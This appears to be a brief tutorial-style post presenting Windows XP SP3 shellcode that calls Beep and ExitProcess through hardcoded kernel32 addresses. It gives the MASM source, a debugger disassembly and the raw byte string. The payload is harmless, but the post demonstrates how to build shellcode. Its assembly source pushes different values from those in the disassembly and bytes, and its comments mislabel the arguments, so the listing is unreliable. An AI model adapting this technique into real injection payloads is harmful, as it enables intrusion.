windows xp-sp3 beep and exitprocess shellcode
author Teo Manojlovic
contact teo.manojlovic@skole.hr

this shellcode is using API call "Beep" which is in kernel32.dll
adress of this API is 7C837A8Fh
adress of exitprocess is 7C81CAFAh

here is assembler code using Intel sintax and MASM32
-------------------- begin----------------
.386

.model flat, STDCALL

.data
 
 .code

start:

xor eax,eax

mov eax,7C837A8Fh ;putting address of beep call

push 200h ; frequency

push 200h ; lenght

call eax ; calling beep

xor eax,eax ; setting 0 to eax register

mov eax,7C81CAFAh ; putting address of exitprocess call

call eax ;calling exitprocess

end start

------------------------end-----------

if we disassemle this code with olly debugger we will get following

00401000 > $ 33C0           XOR EAX,EAX                              ; |
00401002   . B8 8F7A837C    MOV EAX,kernel32.Beep                    ; |
00401007   . 68 00040000    PUSH 400                                 ; |/Duration = 1024. ms
0040100C   . 68 00030000    PUSH 300                                 ; ||Frequency = 300 (768.)
00401011   . FFD0           CALL EAX                                 ; |\Beep
00401013   . 33C0           XOR EAX,EAX                              ; |
00401015   . B8 FACA817C    MOV EAX,kernel32.ExitProcess             ; |
0040101A   . FFD0           CALL EAX                                 ; \ExitProcess

and here is the shellcode

\x33\xC0\xB8\x8F\x7A\x83\x7C\x68\x00\x04\x00\x00\x68\x00\x03\x00\x00\xFF\xD0\x33\xC0\xB8\xFA\xCA\x81\x7C\xFF\xD0